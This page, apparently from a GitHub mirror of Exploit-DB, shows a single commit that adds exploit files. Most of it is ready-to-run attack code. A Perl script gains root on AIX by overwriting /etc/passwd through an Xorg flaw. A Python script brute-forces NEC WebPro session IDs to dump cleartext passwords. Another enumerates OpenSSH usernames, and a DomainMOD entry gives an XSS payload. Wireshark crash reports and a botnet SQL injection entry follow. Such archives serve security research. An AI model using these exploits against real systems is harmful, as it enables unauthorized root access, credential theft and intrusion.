bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-12-05

Browse source 
19 changes to exploits/shellcodes

Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download
Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption
Wireshark - 'find_signature' Heap Out-of-Bounds Read
Xorg X11 Server (AIX) - Local Privilege Escalation
Emacs - movemail Privilege Escalation (Metasploit)
OpenSSH < 7.7 - User Enumeration (2)
HP Intelligent Management - Java Deserialization RCE (Metasploit)
Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass
DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting
NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage
KeyBase Botnet 1.5 - SQL Injection
Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting
DomainMOD 4.11.01 - Custom Domain Fields Cross-Site Scripting
DomainMOD 4.11.01 - Custom SSL Fields Cross-Site Scripting
NUUO NVRMini2 3.9.1 - Authenticated Command Injection
DomainMOD 4.11.01 - Registrar Cross-Site Scripting
FreshRSS 1.11.1 - Cross-Site Scripting

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)
Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)
This commit is contained in:
Offensive Security 2018-12-05 05:01:44 +00:00
parent 0a4925cc93
commit 60710bbfd9
21 changed files with 1523 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

149
exploits/aix/local/45938.pl Executable file
View file

@ -0,0 +1,149 @@
# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privile=
ges.=20
# All currently logged in users need to be included when /etc/passwd is ove=
rwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to ch=
ange user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX=
,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
# =20
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
# Build Operating System: AIX IBM
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
# Build Date: 07 July 2006
# Before reporting problems, check http://wiki.x.org
# to make sure that you have the latest version.
# Module Loader present
# $ id
# uid=3D16500(nmyo) gid=3D1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93=20
# [-] Opening /etc/passwd=20
# [-] Retrieving currently logged in users=20
# [-] Generating Xorg command=20
# [-] Opening /tmp/wow.ksh=20
# [-] Writing Xorg command to /tmp/wow.ksh=20
# [-] Backing up /etc/passwd to /tmp/passwd.backup=20
# [-] Making /tmp/wow.ksh executable=20
# [-] Executing /tmp/wow.ksh=20
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20
# [-] Done=20
# [+] 'su wow' for root shell=20
# $ su wow
# # id
# uid=3D0(root) gid=3D0(system)
# # whoami
# root
#!/usr/bin/perl
print "[+] AIX X11 server local root exploit\n";
# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg =3D `command -v Xorg`);
if ($xorg eq ""){=20
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
exit;
}
# Check ksh93 is in path
chomp($ksh =3D `command -v ksh93`);
if ($ksh eq ""){
print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
exit;
}
# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array =3D <$passwd_fh>);
close($passwd_fh);
# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users =3D `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd =3D '';
foreach my $user (@users)
{
$user .=3D ":";
foreach my $line (@passwd_array)
{
if (index($line, $user) =3D=3D 0) {
$users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l=
ine;
}
}
}
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not=
written to log
print "[-] Generating Xorg command \n";
$blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us=
r/bin/ksh\n#' . '\'';
print "[-] Opening /tmp/wow.ksh \n";=09=09
open($fr, '>', "/tmp/wow.ksh");
# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;
# Backup passwd=20
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
# Make script executable and run it
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");
# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=
::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";

15
exploits/hardware/webapps/45937.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control
# Date: 2018-11-27
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.rockwellautomation.com/
# Version: 1408-EM3A-ENT B
# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
# CVE : CVE-2018-19616
# 1. Description:
# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, there are a few buttons are disabled,
# such as “Edit”, “Remove”, “AddNew”, “Change Policy Holder” and “Security Configuration”.
# View the source code of login page, those buttons/functions just use the “disabled” parameter to control the access right.
# It is allow attackers using proxy to erase the “disabled” parameter, and enable those buttons/functions.
# Once those buttons/functions are enabled.
# Attackers is capable to add a new user who have administrator right.

178
exploits/hardware/webapps/45942.py Executable file
View file

@ -0,0 +1,178 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo B. 0day***
[Vendor]
www.necam.com
[Affected Product Code Base]
NEC Univerge Sv9100 WebPro - 6.00.00
NEC Univerge WebPro, is a web-based programming tool for the NEC Switch, which is used to program corporate Telephone systems.
Public facing installations as of Dec 1, 2018
https://www.shodan.io/search?query=Server+Henry
Result: 7,797
[Vulnerability Type(s)]
[CVE Reference(s)]
Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage - CVE-2018-11742
[Attack Vectors]
Make repeated remote HTTP requests until arriving at a valid authenticated sessionId.
Security Issue:
================
NEC Univerge WebPro suffers from a "Predictable Session ID" that can potentially disclose all user account information including passwords stored in clear text in the Web UI.
Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords.
e.g..
curl http://NEC-VICTIM-IP/Home.htm?sessionId=12959&GOTO(8)
Exploit/POC:
=============
'''
from socket import *
import re
#Univerge Sv9100 NEC WebPro : 6.00
#Dumps user accounts and plaintext passwords stored in Web UI in Administrator Programming Password Setup' webpage
#http://TARGET-IP/Home.htm?sessionId=12959&GOTO(8) "GOTO(8)" will retrieve all account usernames and cleartext passwords.
print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC"
print "hyp3rlinx"
IP=raw_input("[+] TARGET> ")
res=''
findme="Programming Password Setup"
cnt=0
tmp=False
tmp2=False
pwned=False
#check application is NEC and vuln version
def is_NEC_webpro(u):
global tmp,tmp2,cnt
res=''
cnt+=1
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP,80))
s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
while True:
res=s.recv(4048)
if res.find('</html>')!=-1:
break
s.close()
if re.findall(r"\bWebPro\b", res):
tmp=True
if tmp and cnt < 3:
is_NEC_webpro('/Login.htm')
if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res):
tmp2 = True
if tmp == True and tmp2 == True:
return True
return False
def dump(acct):
file=open('NEC-Accounts.txt', 'w')
file.write(acct+'\n')
file.close()
def breach(sid):
global pwned
try:
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP,80))
sid=str(sid)
print 'trying sessid '+sid
s.send('GET /Home.htm?sessionId%3d'+sid+'&GOTO(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
except Exception as e:
print str(e)
while True:
res = s.recv(4096)
if res.find('</html>')!=-1:
break
if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit an active session.
dump(res)
print res
pwned=True
s.close()
return pwned
def sessgen():
for sessid in range(1000,15000): ##test 14109
if breach(sessid):
break
if __name__=='__main__':
if is_NEC_webpro('/'):
sessgen()
else:
print 'Not NEC or version not vuln.'
'''
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: May 15, 2018
No reply
Vendor Notification: May 18, 2018
No reply
Vendor Notification: June 4, 2018
No reply
Mitre assign CVE: June 5, 2018
JPCERT replies: June 6, 2018
JPCERT shares information with NEC : June 7, 2018
Request status : August 11, 2018
JPCERT contact NEC : August 14, 2018
No reply from vendor
Request status : August 21, 2018
JPCERT again contacts NEC : August 21, 2018
JPCERT "vendor working on a release" : August 23 2018
JPCERT "Vendor release October 2018" : September 12, 2018
NEC "Requests public disclosure after December 1st." : November 19, 2018
December 2, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
'''

66
exploits/linux/remote/45939.py Executable file
View file

@ -0,0 +1,66 @@
#!/usr/bin/env python2
# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io
# Credits: Matthew Daley, Justin Gardner, Lee David Painter
import argparse, logging, paramiko, socket, sys, os
class InvalidUsername(Exception):
pass
# malicious function to malform packet
def add_boolean(*args, **kwargs):
pass
# function that'll be overwritten to malform the packet
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
# malicious function to overwrite MSG_SERVICE_ACCEPT handler
def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean
return old_service_accept(*args, **kwargs)
# call when username was invalid
def invalid_username(*args, **kwargs):
raise InvalidUsername()
# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
# perform authentication with malicious packet and username
def check_user(username):
sock = socket.socket()
sock.connect((args.target, args.port))
transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
print '[!] Failed to negotiate SSH transport'
sys.exit(2)
try:
transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
print "[-] {} is an invalid username".format(username)
sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
print "[+] {} is a valid username".format(username)
# remove paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument('username', help="Username to check for validity.")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
check_user(args.username)

180
exploits/multiple/dos/45950.txt Normal file
View file

@ -0,0 +1,180 @@
The following crash due to a stack-based out-of-bounds memory access can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==25039==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0298b086 at pc 0x7fb8215577d8 bp 0x7ffc0298b050 sp 0x7ffc0298b048
READ of size 2 at 0x7ffc0298b086 thread T0
#0 0x7fb8215577d7 in cdma2k_message_ACTIVE_SET_RECORD_FIELDS wireshark/epan/dissectors/packet-cdma2k.c:3861:89
#1 0x7fb8215577d7 in cdma2k_message_HANDOFF_DIR wireshark/epan/dissectors/packet-cdma2k.c:3116
#2 0x7fb821546ea5 in cdma2k_message_decode wireshark/epan/dissectors/packet-cdma2k.c:1224:19
#3 0x7fb821544f23 in dissect_cdma2k wireshark/epan/dissectors/packet-cdma2k.c:4406:13
#4 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#5 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#6 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#7 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#8 0x7fb821908908 in gcsna_message_GCSNA1xCircuitService wireshark/epan/dissectors/packet-gcsna.c:211:9
#9 0x7fb821908908 in gcsna_message_decode wireshark/epan/dissectors/packet-gcsna.c:119
#10 0x7fb821908908 in dissect_gcsna wireshark/epan/dissectors/packet-gcsna.c:342
#11 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#12 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#13 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#14 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#15 0x7fb82307a3d3 in dissect_s1ap_Cdma2000PDU wireshark/./asn1/s1ap/s1ap.cnf:638:9
#16 0x7fb82307a3d3 in dissect_Cdma2000PDU_PDU wireshark/./asn1/s1ap/s1ap.cnf:1313
#17 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#18 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#19 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#20 0x7fb82309bd90 in dissect_ProtocolIEFieldValue wireshark/./asn1/s1ap/packet-s1ap-template.c:367:11
#21 0x7fb8220c7430 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:232:5
#22 0x7fb8220c7692 in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:253:9
#23 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#24 0x7fb82309b878 in dissect_s1ap_ProtocolIE_Field wireshark/./asn1/s1ap/s1ap.cnf:145:12
#25 0x7fb8220cec9e in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:564:10
#26 0x7fb8220cec9e in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:939
#27 0x7fb8230a8950 in dissect_s1ap_ProtocolIE_Container wireshark/./asn1/s1ap/s1ap.cnf:158:12
#28 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#29 0x7fb82308f5ee in dissect_s1ap_E_RABSetupRequest wireshark/./asn1/s1ap/s1ap.cnf:2014:12
#30 0x7fb82308f5ee in dissect_E_RABSetupRequest_PDU wireshark/./asn1/s1ap/s1ap.cnf:2945
#31 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#32 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#33 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#34 0x7fb8230a9442 in dissect_InitiatingMessageValue wireshark/./asn1/s1ap/packet-s1ap-template.c:402:11
#35 0x7fb8220c7430 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:232:5
#36 0x7fb8220c7692 in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:253:9
#37 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#38 0x7fb8230a9098 in dissect_s1ap_InitiatingMessage wireshark/./asn1/s1ap/s1ap.cnf:145:12
#39 0x7fb8220d4d35 in dissect_per_choice wireshark/epan/dissectors/packet-per.c:1749:4
#40 0x7fb8230993a4 in dissect_s1ap_S1AP_PDU wireshark/./asn1/s1ap/s1ap.cnf:179:12
#41 0x7fb8230993a4 in dissect_S1AP_PDU_PDU wireshark/./asn1/s1ap/s1ap.cnf:3841
#42 0x7fb8230993a4 in dissect_s1ap wireshark/./asn1/s1ap/packet-s1ap-template.c:451
#43 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#44 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#45 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#46 0x7fb82230cd76 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2531:9
#47 0x7fb822306b25 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3494:16
#48 0x7fb822302464 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c
#49 0x7fb8222fffd9 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4610:9
#50 0x7fb8222fffd9 in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4751
#51 0x7fb8222fc59b in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4815:3
#52 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#53 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#54 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#55 0x7fb821b8ee45 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1831:7
#56 0x7fb821bd37d9 in ipv6_dissect_next wireshark/epan/dissectors/packet-ipv6.c:2458:9
#57 0x7fb821bd54d3 in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2406:5
#58 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#59 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#60 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#61 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#62 0x7fb821b8f6dd in dissect_ip wireshark/epan/dissectors/packet-ip.c:2315:5
#63 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#64 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#65 0x7fb823377289 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#66 0x7fb823377289 in dissector_try_uint wireshark/epan/packet.c:1407
#67 0x7fb821fb4c99 in dissect_null wireshark/epan/dissectors/packet-null.c:410:12
#68 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#69 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#70 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#71 0x7fb8218f7a28 in dissect_frame wireshark/epan/dissectors/packet-frame.c:579:11
#72 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#73 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#74 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#75 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#76 0x7fb8233721ee in dissect_record wireshark/epan/packet.c:580:3
#77 0x7fb823355068 in epan_dissect_run_with_taps wireshark/epan/epan.c:547:2
#78 0x558d13281917 in process_packet_single_pass wireshark/tshark.c:3572:5
#79 0x558d1327cd12 in process_cap_file wireshark/tshark.c:3403:11
#80 0x558d1327cd12 in real_main wireshark/tshark.c:2046
#81 0x7fb816e972b0 in __libc_start_main
#82 0x558d1317ea49 in _start
Address 0x7ffc0298b086 is located in stack of thread T0 at offset 38 in frame
#0 0x7fb82154fc4f in cdma2k_message_HANDOFF_DIR wireshark/epan/dissectors/packet-cdma2k.c:2856
This frame has 1 object(s):
[32, 34) 'l_offset' <== Memory access at offset 38 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-cdma2k.c:3861:89 in cdma2k_message_ACTIVE_SET_RECORD_FIELDS
Shadow bytes around the buggy address:
0x1000005295c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529600: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x100000529610:[02]f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529630: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 02 f3 f3 f3
0x100000529640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529660: f1 f1 f1 f1 04 f2 02 f3 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25039==ABORTING
--- cut ---
A brief analysis shows that the cdma2k_message_ACTIVE_SET_RECORD_FIELDS() function accepts an "guint16 *l_offset" argument, and successively increases the value under the pointer as it parses through the packet, e.g.:
--- cut ---
3797 *l_offset+=5;
...
3808 *l_offset+=4;
...
3815 *l_offset+=5;
...
3835 *l_offset+=3;
--- cut ---
In lines 3860 and 3865 however, the code increases the pointer itself and not the underlying value, causing it to point to some invalid location on the stack. The extent to which the pointer is shifted by is somewhat controlled by the attacker due to the loop in lines 3862-3867:
--- cut ---
3859 recLen = tvb_get_bits8(tvb,*l_offset, 3);
3860 l_offset+=3;
3861 item2 = proto_tree_add_item(subtree1, hf_cdma2k_Type_Specific_Fields, tvb, (*l_offset/8),recLen+1, ENC_NA);
3862 while(recLen > 0)
3863 {
3864 proto_item_append_text(item2," 0x%02x",tvb_get_bits8(tvb,*l_offset, 8));
3865 l_offset+=8;
3866 recLen-=1;
3867 }
--- cut ---
Later in the code, the corrupted l_offset pointer is both read from and written to multiple times:
--- cut ---
3869 proto_tree_add_bits_item(subtree1, hf_cdma2k_Pwr_Comb_Ind, tvb, *l_offset, 1, ENC_BIG_ENDIAN);
3870 *l_offset+=1;
3871 if(chInd == 5 || chInd == 7)
3872 {
3873 proto_tree_add_bits_item(subtree1, hf_cdma2k_Code_Chan_Fch, tvb, *l_offset, 11, ENC_BIG_ENDIAN);
3874 *l_offset+=11;
3875 proto_tree_add_bits_item(subtree1, hf_cdma2k_Qof_Mask_Id_Fch, tvb, *l_offset, 2, ENC_BIG_ENDIAN);
3876 *l_offset+=2;
3877 }
--- cut ---
Such non-continuous stack-based OOB writes could be leveraged to execute arbitrary code in the context of the Wireshark process.
The bug was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=15322. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45950.zip

57
exploits/multiple/dos/45951.txt Normal file
View file

@ -0,0 +1,57 @@
The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==35788==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62d0000e4400 at pc 0x7f326122bbcc bp 0x7ffef079bc70 sp 0x7ffef079bc68
READ of size 1 at 0x62d0000e4400 thread T0
#0 0x7f326122bbcb in find_signature wireshark/wiretap/vwr.c:3194:13
#1 0x7f32612233e5 in vwr_read_s3_W_rec wireshark/wiretap/vwr.c:2160:19
#2 0x7f32612233e5 in vwr_process_rec_data wireshark/wiretap/vwr.c:3356
#3 0x7f326121acf6 in vwr_read wireshark/wiretap/vwr.c:870:10
#4 0x7f326122e989 in wtap_read wireshark/wiretap/wtap.c:1256:7
#5 0x55da2a01be4f in process_cap_file wireshark/tshark.c:3396:12
#6 0x55da2a01be4f in real_main wireshark/tshark.c:2046
0x62d0000e4400 is located 0 bytes to the right of 32768-byte region [0x62d0000dc400,0x62d0000e4400)
allocated by thread T0 here:
#0 0x55da29fd30c0 in malloc (wireshark/tshark+0x1120c0)
SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/wiretap/vwr.c:3194:13 in find_signature
Shadow bytes around the buggy address:
0x0c5a80014830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5a80014840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5a80014850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5a80014860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5a80014870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c5a80014880:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a80014890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a800148a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a800148b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a800148c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a800148d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==35788==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=15279. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45951.zip

18
exploits/php/webapps/45941.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19749
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01https://github.com/domainmod/domainmod/issues/81
After logging into the Domainmod application panel, browse to the
assets/add/account-owner.php page and inject a javascript XSS payload
in owner name field
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/81

50
exploits/php/webapps/45944.txt Normal file
View file

@ -0,0 +1,50 @@
################################
# Exploit Title: KeyBase Botnet v1.5 - SQL Injection Vulnerability
# Google Dork: intitle:"KeyBase: Login" + intext:"( Login to get access to your logs )"
# Date: 3/12/2018
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: unkn0wn
# Version: v1.5
# Tested on: Windows 10, debian 7
# CVE : n/a
################################
# Vuln-Code: post.php - variant "keystrokes, passwords, clipboard" & "machinename, machinetime"
if ($_GET['type'] == 'keystrokes')
{
$sqlk = "CREATE TABLE if not exists Keystrokes (id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY, machinename VARCHAR(255) NOT NULL, windowtitle VARCHAR(255) NOT NULL,
